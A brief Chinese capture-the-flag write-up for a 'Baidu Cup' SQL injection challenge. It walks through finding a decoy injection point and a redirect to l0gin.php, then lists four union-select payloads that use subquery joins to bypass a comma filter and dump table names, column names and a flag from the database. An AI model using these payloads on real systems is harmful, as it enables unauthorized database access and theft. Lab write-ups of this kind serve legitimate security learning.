百度杯_SQLi

百度杯_SQLi

点进链接发现一个空白网页，查看源代码发现<!-- login.php?id=1 -->，顺着这个文件进去发现是有一个假的注入点。我一开始也不知道这是假的，测半天才发现是假的。

根据提示后台有获取flag的线索。抓个包看一下，发包是没有什么，看一下回包发现了一个文件

发现了被重定向了，继续放包，抓重定向的这个包。

发现了一个l0gin.php?id=1

在参数后面跟个单引号直接报错，那很明显的字符型。union select的时候发现1后面的都没了，那就是逗号之后的都被过滤了。用表链接可以绕过。

?id=0'union select * from (select database()) a join (select null) b#

?id=0'union select * from (select group_concat(table_name) from information_schema.tables where table_schema=database()) a join (select null) b#

?id=0'union select * from (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') a join (select null) b#

?id=0'union select * from (select group_concat(flag_9c861b688330) from users) a join (select null) b%23